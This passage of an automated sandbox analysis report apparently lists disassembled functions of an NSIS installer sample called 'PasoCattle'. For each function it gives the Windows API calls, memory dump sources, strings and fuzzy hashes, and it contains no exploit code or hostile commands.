                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                          • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                          • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                          • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                          • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                          • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                          APIs
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                          • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                          • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                          • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                          • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                          • String ID: $ @$M$N
                                                                                                                                                                          • API String ID: 1638840714-3479655940
                                                                                                                                                                          • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                          • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                          • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                          • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                          • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                          Strings
                                                                                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                          • ptF, xrefs: 00406D1A
                                                                                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                          • \*.*, xrefs: 00406D2F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                          • API String ID: 2035342205-1650287579
                                                                                                                                                                          • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                          • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                          • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                          • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                            • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                            • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406902
                                                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                          • String ID: F$A
                                                                                                                                                                          • API String ID: 3347642858-1281894373
                                                                                                                                                                          • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                          • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                          • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                          • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                                                                                          • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                          • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                          • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                          • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406902
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                          • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406A73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                          • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                          • API String ID: 3581403547-1792361021
                                                                                                                                                                          • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                          • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                          • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                          Strings
                                                                                                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                          • API String ID: 542301482-1377821865
                                                                                                                                                                          • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                          • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
